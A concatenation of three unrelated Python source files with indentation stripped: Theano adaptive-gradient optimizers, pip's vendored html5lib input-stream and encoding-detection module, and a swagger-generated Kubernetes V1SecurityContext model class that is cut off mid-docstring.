def adagrad(loss, all_params, learning_rate=1.0, epsilon=1e-6):
"""
epsilon is not included in the typical formula,
See "Notes on AdaGrad" by Chris Dyer for more info.
"""
all_grads = theano.grad(loss, all_params)
all_accumulators = [theano.shared(np.zeros(param.get_value().shape,
dtype=theano.config.floatX),
broadcastable=param.broadcastable)
for param in all_params]
updates = []
for param_i, grad_i, acc_i in zip(all_params, all_grads, all_accumulators):
acc_i_new = acc_i + grad_i ** 2
updates.append((acc_i, acc_i_new))
updates.append((param_i, (param_i - learning_rate * grad_i /
T.sqrt(acc_i_new + epsilon))))
return updates
def rmsprop(loss, all_params, learning_rate=1.0, rho=0.9, epsilon=1e-6):
"""
epsilon is not included in the description in Hinton's video,
but to prevent problems with relus repeatedly having 0 gradients,
it is included here.
Watch this video for more info: http://www.youtube.com/watch?v=O3sxAc4hxZU
(formula at 5:20)
also check http://climin.readthedocs.org/en/latest/rmsprop.html
"""
all_grads = theano.grad(loss, all_params)
all_accumulators = [theano.shared(np.zeros(param.get_value().shape,
dtype=theano.config.floatX),
broadcastable=param.broadcastable)
for param in all_params]
updates = []
for param_i, grad_i, acc_i in zip(all_params, all_grads, all_accumulators):
acc_i_new = rho * acc_i + (1 - rho) * grad_i ** 2
updates.append((acc_i, acc_i_new))
updates.append((param_i, (param_i - learning_rate * grad_i /
T.sqrt(acc_i_new + epsilon))))
return updates
def adadelta(loss, all_params, learning_rate=1.0, rho=0.95, epsilon=1e-6):
"""
in the paper, no learning rate is considered (so learning_rate=1.0).
Probably best to keep it at this value.
epsilon is important for the very first update (so the numerator does
not become 0).
rho = 0.95 and epsilon=1e-6 are suggested in the paper and reported to
work for multiple datasets (MNIST, speech).
see "Adadelta: an adaptive learning rate method" by Matthew Zeiler
for more info.
"""
all_grads = theano.grad(loss, all_params)
all_accumulators = [theano.shared(np.zeros(param.get_value().shape,
dtype=theano.config.floatX),
broadcastable=param.broadcastable)
for param in all_params]
all_delta_accumulators = [
theano.shared(np.zeros(param.get_value().shape,
dtype=theano.config.floatX),
broadcastable=param.broadcastable)
for param in all_params
]
# all_accumulators: accumulate gradient magnitudes
# all_delta_accumulators: accumulate update magnitudes (recursive!)
updates = []
for param_i, grad_i, acc_i, acc_delta_i in zip(all_params,
all_grads,
all_accumulators,
all_delta_accumulators):
acc_i_new = rho * acc_i + (1 - rho) * grad_i ** 2
updates.append((acc_i, acc_i_new))
update_i = (grad_i * T.sqrt(acc_delta_i + epsilon) /
# use the 'old' acc_delta here
T.sqrt(acc_i_new + epsilon))
updates.append((param_i, param_i - learning_rate * update_i))
acc_delta_i_new = rho * acc_delta_i + (1 - rho) * update_i ** 2
updates.append((acc_delta_i, acc_delta_i_new))
return updates
def norm_constraint(tensor_var, max_norm, norm_axes=None, epsilon=1e-7):
"""
Max weight norm constraints and gradient clipping
This takes a TensorVariable and rescales it so that incoming weight
norms are below a specified constraint value. Vectors violating the
constraint are rescaled so that they are within the allowed range.
:parameters:
- tensor_var : TensorVariable
Theano expression for update, gradient, or other quantity.
- max_norm : scalar
This value sets the maximum allowed value of any norm in
`tensor_var`.
- norm_axes : sequence (list or tuple)
The axes over which to compute the norm. This overrides the
default norm axes defined for the number of dimensions
in `tensor_var`. When this is not specified and `tensor_var` is a
matrix (2D), this is set to `(0,)`. If `tensor_var` is a 3D, 4D or
5D tensor, it is set to a tuple listing all axes but axis 0. The
former default is useful for working with dense layers, the latter
is useful for 1D, 2D and 3D convolutional layers.
(Optional)
- epsilon : scalar
Value used to prevent numerical instability when dividing by
very small or zero norms.
(Optional)
:returns:
- constrained_output : TensorVariable
Input `tensor_var` with rescaling applied to weight vectors
that violate the specified constraints.
:usage:
>>> param = theano.shared(
... np.random.randn(100, 200).astype(theano.config.floatX))
>>> update = param + 100
>>> update = norm_constraint(update, 10)
>>> func = theano.function([], [], updates=[(param, update)])
>>> # Apply constrained update
>>> _ = func()
>>> from lasagne.utils import compute_norms
>>> norms = compute_norms(param.get_value())
>>> np.isclose(np.max(norms), 10)
True
:note:
When `norm_axes` is not specified, the axes over which the norm is
computed depend on the dimensionality of the input variable. If it is
2D, it is assumed to come from a dense layer, and the norm is computed
over axis 0. If it is 3D, 4D or 5D, it is assumed to come from a
convolutional layer and the norm is computed over all trailing axes
beyond axis 0. For other uses, you should explicitly specify the axes
over which to compute the norm using `norm_axes`.
"""
ndim = tensor_var.ndim
if norm_axes is not None:
sum_over = tuple(norm_axes)
elif ndim == 2: # DenseLayer
sum_over = (0,)
elif ndim in [3, 4, 5]: # Conv{1,2,3}DLayer
sum_over = tuple(range(1, ndim))
else:
raise ValueError(
"Unsupported tensor dimensionality {}."
"Must specify `norm_axes`".format(ndim)
)
dtype = np.dtype(theano.config.floatX).type
norms = T.sqrt(T.sum(T.sqr(tensor_var), axis=sum_over, keepdims=True))
target_norms = T.clip(norms, 0, dtype(max_norm))
constrained_output = \
(tensor_var * (target_norms / (dtype(epsilon) + norms)))
return constrained_output
|
|
from __future__ import absolute_import, division, unicode_literals
from pip._vendor.six import text_type, binary_type
from pip._vendor.six.moves import http_client, urllib
import codecs
import re
from pip._vendor import webencodings
from .constants import EOF, spaceCharacters, asciiLetters, asciiUppercase
from .constants import ReparseException
from . import _utils
from io import StringIO
try:
from io import BytesIO
except ImportError:
BytesIO = StringIO
# Non-unicode versions of constants for use in the pre-parser
spaceCharactersBytes = frozenset([item.encode("ascii") for item in spaceCharacters])
asciiLettersBytes = frozenset([item.encode("ascii") for item in asciiLetters])
asciiUppercaseBytes = frozenset([item.encode("ascii") for item in asciiUppercase])
spacesAngleBrackets = spaceCharactersBytes | frozenset([b">", b"<"])
invalid_unicode_no_surrogate = "[\u0001-\u0008\u000B\u000E-\u001F\u007F-\u009F\uFDD0-\uFDEF\uFFFE\uFFFF\U0001FFFE\U0001FFFF\U0002FFFE\U0002FFFF\U0003FFFE\U0003FFFF\U0004FFFE\U0004FFFF\U0005FFFE\U0005FFFF\U0006FFFE\U0006FFFF\U0007FFFE\U0007FFFF\U0008FFFE\U0008FFFF\U0009FFFE\U0009FFFF\U000AFFFE\U000AFFFF\U000BFFFE\U000BFFFF\U000CFFFE\U000CFFFF\U000DFFFE\U000DFFFF\U000EFFFE\U000EFFFF\U000FFFFE\U000FFFFF\U0010FFFE\U0010FFFF]" # noqa
if _utils.supports_lone_surrogates:
# Use one extra step of indirection and create surrogates with
# eval. Not using this indirection would introduce an illegal
# unicode literal on platforms not supporting such lone
# surrogates.
assert invalid_unicode_no_surrogate[-1] == "]" and invalid_unicode_no_surrogate.count("]") == 1
invalid_unicode_re = re.compile(invalid_unicode_no_surrogate[:-1] +
eval('"\\uD800-\\uDFFF"') + # pylint:disable=eval-used
"]")
else:
invalid_unicode_re = re.compile(invalid_unicode_no_surrogate)
non_bmp_invalid_codepoints = set([0x1FFFE, 0x1FFFF, 0x2FFFE, 0x2FFFF, 0x3FFFE,
0x3FFFF, 0x4FFFE, 0x4FFFF, 0x5FFFE, 0x5FFFF,
0x6FFFE, 0x6FFFF, 0x7FFFE, 0x7FFFF, 0x8FFFE,
0x8FFFF, 0x9FFFE, 0x9FFFF, 0xAFFFE, 0xAFFFF,
0xBFFFE, 0xBFFFF, 0xCFFFE, 0xCFFFF, 0xDFFFE,
0xDFFFF, 0xEFFFE, 0xEFFFF, 0xFFFFE, 0xFFFFF,
0x10FFFE, 0x10FFFF])
ascii_punctuation_re = re.compile("[\u0009-\u000D\u0020-\u002F\u003A-\u0040\u005B-\u0060\u007B-\u007E]")
# Cache for charsUntil()
charsUntilRegEx = {}
class BufferedStream(object):
"""Buffering for streams that do not have buffering of their own
The buffer is implemented as a list of chunks on the assumption that
joining many strings will be slow since it is O(n**2)
"""
def __init__(self, stream):
self.stream = stream
self.buffer = []
self.position = [-1, 0] # chunk number, offset
def tell(self):
pos = 0
for chunk in self.buffer[:self.position[0]]:
pos += len(chunk)
pos += self.position[1]
return pos
def seek(self, pos):
assert pos <= self._bufferedBytes()
offset = pos
i = 0
while len(self.buffer[i]) < offset:
offset -= len(self.buffer[i])
i += 1
self.position = [i, offset]
def read(self, bytes):
if not self.buffer:
return self._readStream(bytes)
elif (self.position[0] == len(self.buffer) and
self.position[1] == len(self.buffer[-1])):
return self._readStream(bytes)
else:
return self._readFromBuffer(bytes)
def _bufferedBytes(self):
return sum([len(item) for item in self.buffer])
def _readStream(self, bytes):
data = self.stream.read(bytes)
self.buffer.append(data)
self.position[0] += 1
self.position[1] = len(data)
return data
def _readFromBuffer(self, bytes):
remainingBytes = bytes
rv = []
bufferIndex = self.position[0]
bufferOffset = self.position[1]
while bufferIndex < len(self.buffer) and remainingBytes != 0:
assert remainingBytes > 0
bufferedData = self.buffer[bufferIndex]
if remainingBytes <= len(bufferedData) - bufferOffset:
bytesToRead = remainingBytes
self.position = [bufferIndex, bufferOffset + bytesToRead]
else:
bytesToRead = len(bufferedData) - bufferOffset
self.position = [bufferIndex, len(bufferedData)]
bufferIndex += 1
rv.append(bufferedData[bufferOffset:bufferOffset + bytesToRead])
remainingBytes -= bytesToRead
bufferOffset = 0
if remainingBytes:
rv.append(self._readStream(remainingBytes))
return b"".join(rv)
def HTMLInputStream(source, **kwargs):
# Work around Python bug #20007: read(0) closes the connection.
# http://bugs.python.org/issue20007
if (isinstance(source, http_client.HTTPResponse) or
# Also check for addinfourl wrapping HTTPResponse
(isinstance(source, urllib.response.addbase) and
isinstance(source.fp, http_client.HTTPResponse))):
isUnicode = False
elif hasattr(source, "read"):
isUnicode = isinstance(source.read(0), text_type)
else:
isUnicode = isinstance(source, text_type)
if isUnicode:
encodings = [x for x in kwargs if x.endswith("_encoding")]
if encodings:
raise TypeError("Cannot set an encoding with a unicode input, set %r" % encodings)
return HTMLUnicodeInputStream(source, **kwargs)
else:
return HTMLBinaryInputStream(source, **kwargs)
class HTMLUnicodeInputStream(object):
"""Provides a unicode stream of characters to the HTMLTokenizer.
This class takes care of character encoding and removing or replacing
incorrect byte-sequences and also provides column and line tracking.
"""
_defaultChunkSize = 10240
def __init__(self, source):
"""Initialises the HTMLInputStream.
HTMLInputStream(source, [encoding]) -> Normalized stream from source
for use by html5lib.
source can be either a file-object, local filename or a string.
The optional encoding parameter must be a string that indicates
the encoding. If specified, that encoding will be used,
regardless of any BOM or later declaration (such as in a meta
element)
"""
if not _utils.supports_lone_surrogates:
# Such platforms will have already checked for such
# surrogate errors, so no need to do this checking.
self.reportCharacterErrors = None
elif len("\U0010FFFF") == 1:
self.reportCharacterErrors = self.characterErrorsUCS4
else:
self.reportCharacterErrors = self.characterErrorsUCS2
# List of where new lines occur
self.newLines = [0]
self.charEncoding = (lookupEncoding("utf-8"), "certain")
self.dataStream = self.openStream(source)
self.reset()
def reset(self):
self.chunk = ""
self.chunkSize = 0
self.chunkOffset = 0
self.errors = []
# number of (complete) lines in previous chunks
self.prevNumLines = 0
# number of columns in the last line of the previous chunk
self.prevNumCols = 0
# Deal with CR LF and surrogates split over chunk boundaries
self._bufferedCharacter = None
def openStream(self, source):
"""Produces a file object from source.
source can be either a file object, local filename or a string.
"""
# Already a file object
if hasattr(source, 'read'):
stream = source
else:
stream = StringIO(source)
return stream
def _position(self, offset):
chunk = self.chunk
nLines = chunk.count('\n', 0, offset)
positionLine = self.prevNumLines + nLines
lastLinePos = chunk.rfind('\n', 0, offset)
if lastLinePos == -1:
positionColumn = self.prevNumCols + offset
else:
positionColumn = offset - (lastLinePos + 1)
return (positionLine, positionColumn)
def position(self):
"""Returns (line, col) of the current position in the stream."""
line, col = self._position(self.chunkOffset)
return (line + 1, col)
def char(self):
""" Read one character from the stream or queue if available. Return
EOF when EOF is reached.
"""
# Read a new chunk from the input stream if necessary
if self.chunkOffset >= self.chunkSize:
if not self.readChunk():
return EOF
chunkOffset = self.chunkOffset
char = self.chunk[chunkOffset]
self.chunkOffset = chunkOffset + 1
return char
def readChunk(self, chunkSize=None):
if chunkSize is None:
chunkSize = self._defaultChunkSize
self.prevNumLines, self.prevNumCols = self._position(self.chunkSize)
self.chunk = ""
self.chunkSize = 0
self.chunkOffset = 0
data = self.dataStream.read(chunkSize)
# Deal with CR LF and surrogates broken across chunks
if self._bufferedCharacter:
data = self._bufferedCharacter + data
self._bufferedCharacter = None
elif not data:
# We have no more data, bye-bye stream
return False
if len(data) > 1:
lastv = ord(data[-1])
if lastv == 0x0D or 0xD800 <= lastv <= 0xDBFF:
self._bufferedCharacter = data[-1]
data = data[:-1]
if self.reportCharacterErrors:
self.reportCharacterErrors(data)
# Replace invalid characters
data = data.replace("\r\n", "\n")
data = data.replace("\r", "\n")
self.chunk = data
self.chunkSize = len(data)
return True
def characterErrorsUCS4(self, data):
for _ in range(len(invalid_unicode_re.findall(data))):
self.errors.append("invalid-codepoint")
def characterErrorsUCS2(self, data):
# Someone picked the wrong compile option
# You lose
skip = False
for match in invalid_unicode_re.finditer(data):
if skip:
continue
codepoint = ord(match.group())
pos = match.start()
# Pretty sure there should be endianness issues here
if _utils.isSurrogatePair(data[pos:pos + 2]):
# We have a surrogate pair!
char_val = _utils.surrogatePairToCodepoint(data[pos:pos + 2])
if char_val in non_bmp_invalid_codepoints:
self.errors.append("invalid-codepoint")
skip = True
elif (codepoint >= 0xD800 and codepoint <= 0xDFFF and
pos == len(data) - 1):
self.errors.append("invalid-codepoint")
else:
skip = False
self.errors.append("invalid-codepoint")
def charsUntil(self, characters, opposite=False):
""" Returns a string of characters from the stream up to but not
including any character in 'characters' or EOF. 'characters' must be
a container that supports the 'in' method and iteration over its
characters.
"""
# Use a cache of regexps to find the required characters
try:
chars = charsUntilRegEx[(characters, opposite)]
except KeyError:
if __debug__:
for c in characters:
assert(ord(c) < 128)
regex = "".join(["\\x%02x" % ord(c) for c in characters])
if not opposite:
regex = "^%s" % regex
chars = charsUntilRegEx[(characters, opposite)] = re.compile("[%s]+" % regex)
rv = []
while True:
# Find the longest matching prefix
m = chars.match(self.chunk, self.chunkOffset)
if m is None:
# If nothing matched, and it wasn't because we ran out of chunk,
# then stop
if self.chunkOffset != self.chunkSize:
break
else:
end = m.end()
# If not the whole chunk matched, return everything
# up to the part that didn't match
if end != self.chunkSize:
rv.append(self.chunk[self.chunkOffset:end])
self.chunkOffset = end
break
# If the whole remainder of the chunk matched,
# use it all and read the next chunk
rv.append(self.chunk[self.chunkOffset:])
if not self.readChunk():
# Reached EOF
break
r = "".join(rv)
return r
def unget(self, char):
# Only one character is allowed to be ungotten at once - it must
# be consumed again before any further call to unget
if char is not None:
if self.chunkOffset == 0:
# unget is called quite rarely, so it's a good idea to do
# more work here if it saves a bit of work in the frequently
# called char and charsUntil.
# So, just prepend the ungotten character onto the current
# chunk:
self.chunk = char + self.chunk
self.chunkSize += 1
else:
self.chunkOffset -= 1
assert self.chunk[self.chunkOffset] == char
class HTMLBinaryInputStream(HTMLUnicodeInputStream):
"""Provides a unicode stream of characters to the HTMLTokenizer.
This class takes care of character encoding and removing or replacing
incorrect byte-sequences and also provides column and line tracking.
"""
def __init__(self, source, override_encoding=None, transport_encoding=None,
same_origin_parent_encoding=None, likely_encoding=None,
default_encoding="windows-1252", useChardet=True):
"""Initialises the HTMLInputStream.
HTMLInputStream(source, [encoding]) -> Normalized stream from source
for use by html5lib.
source can be either a file-object, local filename or a string.
The optional encoding parameter must be a string that indicates
the encoding. If specified, that encoding will be used,
regardless of any BOM or later declaration (such as in a meta
element)
"""
# Raw Stream - for unicode objects this will encode to utf-8 and set
# self.charEncoding as appropriate
self.rawStream = self.openStream(source)
HTMLUnicodeInputStream.__init__(self, self.rawStream)
# Encoding Information
# Number of bytes to use when looking for a meta element with
# encoding information
self.numBytesMeta = 1024
# Number of bytes to use when using detecting encoding using chardet
self.numBytesChardet = 100
# Things from args
self.override_encoding = override_encoding
self.transport_encoding = transport_encoding
self.same_origin_parent_encoding = same_origin_parent_encoding
self.likely_encoding = likely_encoding
self.default_encoding = default_encoding
# Determine encoding
self.charEncoding = self.determineEncoding(useChardet)
assert self.charEncoding[0] is not None
# Call superclass
self.reset()
def reset(self):
self.dataStream = self.charEncoding[0].codec_info.streamreader(self.rawStream, 'replace')
HTMLUnicodeInputStream.reset(self)
def openStream(self, source):
"""Produces a file object from source.
source can be either a file object, local filename or a string.
"""
# Already a file object
if hasattr(source, 'read'):
stream = source
else:
stream = BytesIO(source)
try:
stream.seek(stream.tell())
except: # pylint:disable=bare-except
stream = BufferedStream(stream)
return stream
def determineEncoding(self, chardet=True):
# BOMs take precedence over everything
# This will also read past the BOM if present
charEncoding = self.detectBOM(), "certain"
if charEncoding[0] is not None:
return charEncoding
# If we've been overriden, we've been overriden
charEncoding = lookupEncoding(self.override_encoding), "certain"
if charEncoding[0] is not None:
return charEncoding
# Now check the transport layer
charEncoding = lookupEncoding(self.transport_encoding), "certain"
if charEncoding[0] is not None:
return charEncoding
# Look for meta elements with encoding information
charEncoding = self.detectEncodingMeta(), "tentative"
if charEncoding[0] is not None:
return charEncoding
# Parent document encoding
charEncoding = lookupEncoding(self.same_origin_parent_encoding), "tentative"
if charEncoding[0] is not None and not charEncoding[0].name.startswith("utf-16"):
return charEncoding
# "likely" encoding
charEncoding = lookupEncoding(self.likely_encoding), "tentative"
if charEncoding[0] is not None:
return charEncoding
# Guess with chardet, if available
if chardet:
try:
from chardet.universaldetector import UniversalDetector
except ImportError:
pass
else:
buffers = []
detector = UniversalDetector()
while not detector.done:
buffer = self.rawStream.read(self.numBytesChardet)
assert isinstance(buffer, bytes)
if not buffer:
break
buffers.append(buffer)
detector.feed(buffer)
detector.close()
encoding = lookupEncoding(detector.result['encoding'])
self.rawStream.seek(0)
if encoding is not None:
return encoding, "tentative"
# Try the default encoding
charEncoding = lookupEncoding(self.default_encoding), "tentative"
if charEncoding[0] is not None:
return charEncoding
# Fallback to html5lib's default if even that hasn't worked
return lookupEncoding("windows-1252"), "tentative"
def changeEncoding(self, newEncoding):
assert self.charEncoding[1] != "certain"
newEncoding = lookupEncoding(newEncoding)
if newEncoding is None:
return
if newEncoding.name in ("utf-16be", "utf-16le"):
newEncoding = lookupEncoding("utf-8")
assert newEncoding is not None
elif newEncoding == self.charEncoding[0]:
self.charEncoding = (self.charEncoding[0], "certain")
else:
self.rawStream.seek(0)
self.charEncoding = (newEncoding, "certain")
self.reset()
raise ReparseException("Encoding changed from %s to %s" % (self.charEncoding[0], newEncoding))
def detectBOM(self):
"""Attempts to detect at BOM at the start of the stream. If
an encoding can be determined from the BOM return the name of the
encoding otherwise return None"""
bomDict = {
codecs.BOM_UTF8: 'utf-8',
codecs.BOM_UTF16_LE: 'utf-16le', codecs.BOM_UTF16_BE: 'utf-16be',
codecs.BOM_UTF32_LE: 'utf-32le', codecs.BOM_UTF32_BE: 'utf-32be'
}
# Go to beginning of file and read in 4 bytes
string = self.rawStream.read(4)
assert isinstance(string, bytes)
# Try detecting the BOM using bytes from the string
encoding = bomDict.get(string[:3]) # UTF-8
seek = 3
if not encoding:
# Need to detect UTF-32 before UTF-16
encoding = bomDict.get(string) # UTF-32
seek = 4
if not encoding:
encoding = bomDict.get(string[:2]) # UTF-16
seek = 2
# Set the read position past the BOM if one was found, otherwise
# set it to the start of the stream
if encoding:
self.rawStream.seek(seek)
return lookupEncoding(encoding)
else:
self.rawStream.seek(0)
return None
def detectEncodingMeta(self):
"""Report the encoding declared by the meta element
"""
buffer = self.rawStream.read(self.numBytesMeta)
assert isinstance(buffer, bytes)
parser = EncodingParser(buffer)
self.rawStream.seek(0)
encoding = parser.getEncoding()
if encoding is not None and encoding.name in ("utf-16be", "utf-16le"):
encoding = lookupEncoding("utf-8")
return encoding
class EncodingBytes(bytes):
"""String-like object with an associated position and various extra methods
If the position is ever greater than the string length then an exception is
raised"""
def __new__(self, value):
assert isinstance(value, bytes)
return bytes.__new__(self, value.lower())
def __init__(self, value):
# pylint:disable=unused-argument
self._position = -1
def __iter__(self):
return self
def __next__(self):
p = self._position = self._position + 1
if p >= len(self):
raise StopIteration
elif p < 0:
raise TypeError
return self[p:p + 1]
def next(self):
# Py2 compat
return self.__next__()
def previous(self):
p = self._position
if p >= len(self):
raise StopIteration
elif p < 0:
raise TypeError
self._position = p = p - 1
return self[p:p + 1]
def setPosition(self, position):
if self._position >= len(self):
raise StopIteration
self._position = position
def getPosition(self):
if self._position >= len(self):
raise StopIteration
if self._position >= 0:
return self._position
else:
return None
position = property(getPosition, setPosition)
def getCurrentByte(self):
return self[self.position:self.position + 1]
currentByte = property(getCurrentByte)
def skip(self, chars=spaceCharactersBytes):
"""Skip past a list of characters"""
p = self.position # use property for the error-checking
while p < len(self):
c = self[p:p + 1]
if c not in chars:
self._position = p
return c
p += 1
self._position = p
return None
def skipUntil(self, chars):
p = self.position
while p < len(self):
c = self[p:p + 1]
if c in chars:
self._position = p
return c
p += 1
self._position = p
return None
def matchBytes(self, bytes):
"""Look for a sequence of bytes at the start of a string. If the bytes
are found return True and advance the position to the byte after the
match. Otherwise return False and leave the position alone"""
p = self.position
data = self[p:p + len(bytes)]
rv = data.startswith(bytes)
if rv:
self.position += len(bytes)
return rv
def jumpTo(self, bytes):
"""Look for the next sequence of bytes matching a given sequence. If
a match is found advance the position to the last byte of the match"""
newPosition = self[self.position:].find(bytes)
if newPosition > -1:
# XXX: This is ugly, but I can't see a nicer way to fix this.
if self._position == -1:
self._position = 0
self._position += (newPosition + len(bytes) - 1)
return True
else:
raise StopIteration
class EncodingParser(object):
"""Mini parser for detecting character encoding from meta elements"""
def __init__(self, data):
"""string - the data to work on for encoding detection"""
self.data = EncodingBytes(data)
self.encoding = None
def getEncoding(self):
methodDispatch = (
(b"<!--", self.handleComment),
(b"<meta", self.handleMeta),
(b"</", self.handlePossibleEndTag),
(b"<!", self.handleOther),
(b"<?", self.handleOther),
(b"<", self.handlePossibleStartTag))
for _ in self.data:
keepParsing = True
for key, method in methodDispatch:
if self.data.matchBytes(key):
try:
keepParsing = method()
break
except StopIteration:
keepParsing = False
break
if not keepParsing:
break
return self.encoding
def handleComment(self):
"""Skip over comments"""
return self.data.jumpTo(b"-->")
def handleMeta(self):
if self.data.currentByte not in spaceCharactersBytes:
# if we have <meta not followed by a space so just keep going
return True
# We have a valid meta element we want to search for attributes
hasPragma = False
pendingEncoding = None
while True:
# Try to find the next attribute after the current position
attr = self.getAttribute()
if attr is None:
return True
else:
if attr[0] == b"http-equiv":
hasPragma = attr[1] == b"content-type"
if hasPragma and pendingEncoding is not None:
self.encoding = pendingEncoding
return False
elif attr[0] == b"charset":
tentativeEncoding = attr[1]
codec = lookupEncoding(tentativeEncoding)
if codec is not None:
self.encoding = codec
return False
elif attr[0] == b"content":
contentParser = ContentAttrParser(EncodingBytes(attr[1]))
tentativeEncoding = contentParser.parse()
if tentativeEncoding is not None:
codec = lookupEncoding(tentativeEncoding)
if codec is not None:
if hasPragma:
self.encoding = codec
return False
else:
pendingEncoding = codec
def handlePossibleStartTag(self):
return self.handlePossibleTag(False)
def handlePossibleEndTag(self):
next(self.data)
return self.handlePossibleTag(True)
def handlePossibleTag(self, endTag):
data = self.data
if data.currentByte not in asciiLettersBytes:
# If the next byte is not an ascii letter either ignore this
# fragment (possible start tag case) or treat it according to
# handleOther
if endTag:
data.previous()
self.handleOther()
return True
c = data.skipUntil(spacesAngleBrackets)
if c == b"<":
# return to the first step in the overall "two step" algorithm
# reprocessing the < byte
data.previous()
else:
# Read all attributes
attr = self.getAttribute()
while attr is not None:
attr = self.getAttribute()
return True
def handleOther(self):
return self.data.jumpTo(b">")
def getAttribute(self):
"""Return a name,value pair for the next attribute in the stream,
if one is found, or None"""
data = self.data
# Step 1 (skip chars)
c = data.skip(spaceCharactersBytes | frozenset([b"/"]))
assert c is None or len(c) == 1
# Step 2
if c in (b">", None):
return None
# Step 3
attrName = []
attrValue = []
# Step 4 attribute name
while True:
if c == b"=" and attrName:
break
elif c in spaceCharactersBytes:
# Step 6!
c = data.skip()
break
elif c in (b"/", b">"):
return b"".join(attrName), b""
elif c in asciiUppercaseBytes:
attrName.append(c.lower())
elif c is None:
return None
else:
attrName.append(c)
# Step 5
c = next(data)
# Step 7
if c != b"=":
data.previous()
return b"".join(attrName), b""
# Step 8
next(data)
# Step 9
c = data.skip()
# Step 10
if c in (b"'", b'"'):
# 10.1
quoteChar = c
while True:
# 10.2
c = next(data)
# 10.3
if c == quoteChar:
next(data)
return b"".join(attrName), b"".join(attrValue)
# 10.4
elif c in asciiUppercaseBytes:
attrValue.append(c.lower())
# 10.5
else:
attrValue.append(c)
elif c == b">":
return b"".join(attrName), b""
elif c in asciiUppercaseBytes:
attrValue.append(c.lower())
elif c is None:
return None
else:
attrValue.append(c)
# Step 11
while True:
c = next(data)
if c in spacesAngleBrackets:
return b"".join(attrName), b"".join(attrValue)
elif c in asciiUppercaseBytes:
attrValue.append(c.lower())
elif c is None:
return None
else:
attrValue.append(c)
class ContentAttrParser(object):
def __init__(self, data):
assert isinstance(data, bytes)
self.data = data
def parse(self):
try:
# Check if the attr name is charset
# otherwise return
self.data.jumpTo(b"charset")
self.data.position += 1
self.data.skip()
if not self.data.currentByte == b"=":
# If there is no = sign keep looking for attrs
return None
self.data.position += 1
self.data.skip()
# Look for an encoding between matching quote marks
if self.data.currentByte in (b'"', b"'"):
quoteMark = self.data.currentByte
self.data.position += 1
oldPosition = self.data.position
if self.data.jumpTo(quoteMark):
return self.data[oldPosition:self.data.position]
else:
return None
else:
# Unquoted value
oldPosition = self.data.position
try:
self.data.skipUntil(spaceCharactersBytes)
return self.data[oldPosition:self.data.position]
except StopIteration:
# Return the whole remaining value
return self.data[oldPosition:]
except StopIteration:
return None
def lookupEncoding(encoding):
"""Return the python codec name corresponding to an encoding or None if the
string doesn't correspond to a valid encoding."""
if isinstance(encoding, binary_type):
try:
encoding = encoding.decode("ascii")
except UnicodeDecodeError:
return None
if encoding is not None:
try:
return webencodings.lookup(encoding)
except AttributeError:
return None
else:
return None
|
|
# coding: utf-8
"""
OpenAPI spec version:
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from pprint import pformat
from six import iteritems
import re
class V1SecurityContext(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
operations = [
]
# The key is attribute name
# and the value is attribute type.
swagger_types = {
'capabilities': 'V1Capabilities',
'privileged': 'bool',
'se_linux_options': 'V1SELinuxOptions',
'run_as_user': 'int',
'run_as_non_root': 'bool',
'read_only_root_filesystem': 'bool'
}
# The key is attribute name
# and the value is json key in definition.
attribute_map = {
'capabilities': 'capabilities',
'privileged': 'privileged',
'se_linux_options': 'seLinuxOptions',
'run_as_user': 'runAsUser',
'run_as_non_root': 'runAsNonRoot',
'read_only_root_filesystem': 'readOnlyRootFilesystem'
}
def __init__(self, capabilities=None, privileged=None, se_linux_options=None, run_as_user=None, run_as_non_root=None, read_only_root_filesystem=None):
"""
V1SecurityContext - a model defined in Swagger
"""
self._capabilities = capabilities
self._privileged = privileged
self._se_linux_options = se_linux_options
self._run_as_user = run_as_user
self._run_as_non_root = run_as_non_root
self._read_only_root_filesystem = read_only_root_filesystem
@property
def capabilities(self):
"""
Gets the capabilities of this V1SecurityContext.
The capabilities to add/drop when running containers. Defaults to the default set of capabilities granted by the container runtime.
:return: The capabilities of this V1SecurityContext.
:rtype: V1Capabilities
"""
return self._capabilities
@capabilities.setter
def capabilities(self, capabilities):
"""
Sets the capabilities of this V1SecurityContext.
The capabilities to add/drop when running containers. Defaults to the default set of capabilities granted by the container runtime.
:param capabilities: The capabilities of this V1SecurityContext.
:type: V1Capabilities
"""
self._capabilities = capabilities
@property
def privileged(self):
"""
Gets the privileged of this V1SecurityContext.
Run container in privileged mode. Processes in privileged containers are essentially equivalent to root on the host. Defaults to false.
:return: The privileged of this V1SecurityContext.
:rtype: bool
"""
return self._privileged
@privileged.setter
def privileged(self, privileged):
"""
Sets the privileged of this V1SecurityContext.
Run container in privileged mode. Processes in privileged containers are essentially equivalent to root on the host. Defaults to false.
:param privileged: The privileged of this V1SecurityContext.
:type: bool
"""
self._privileged = privileged
@property
def se_linux_options(self):
"""
Gets the se_linux_options of this V1SecurityContext.
The SELinux context to be applied to the container. If unspecified, the container runtime will allocate a random SELinux context for each container. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence.
:return: The se_linux_options of this V1SecurityContext.
:rtype: V1SELinuxOptions
"""
return self._se_linux_options
@se_linux_options.setter
def se_linux_options(self, se_linux_options):
"""
Sets the se_linux_options of this V1SecurityContext.
The SELinux context to be applied to the container. If unspecified, the container runtime will allocate a random SELinux context for each container. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence.
:param se_linux_options: The se_linux_options of this V1SecurityContext.
:type: V1SELinuxOptions
"""
self._se_linux_options = se_linux_options
@property
def run_as_user(self):
"""
Gets the run_as_user of this V1SecurityContext.
The UID to run the entrypoint of the container process. Defaults to user specified in image metadata if unspecified. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence.
:return: The run_as_user of this V1SecurityContext.
:rtype: int
"""
return self._run_as_user
@run_as_user.setter
def run_as_user(self, run_as_user):
"""
Sets the run_as_user of this V1SecurityContext.
The UID to run the entrypoint of the container process. Defaults to user specified in image metadata if unspecified. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence.
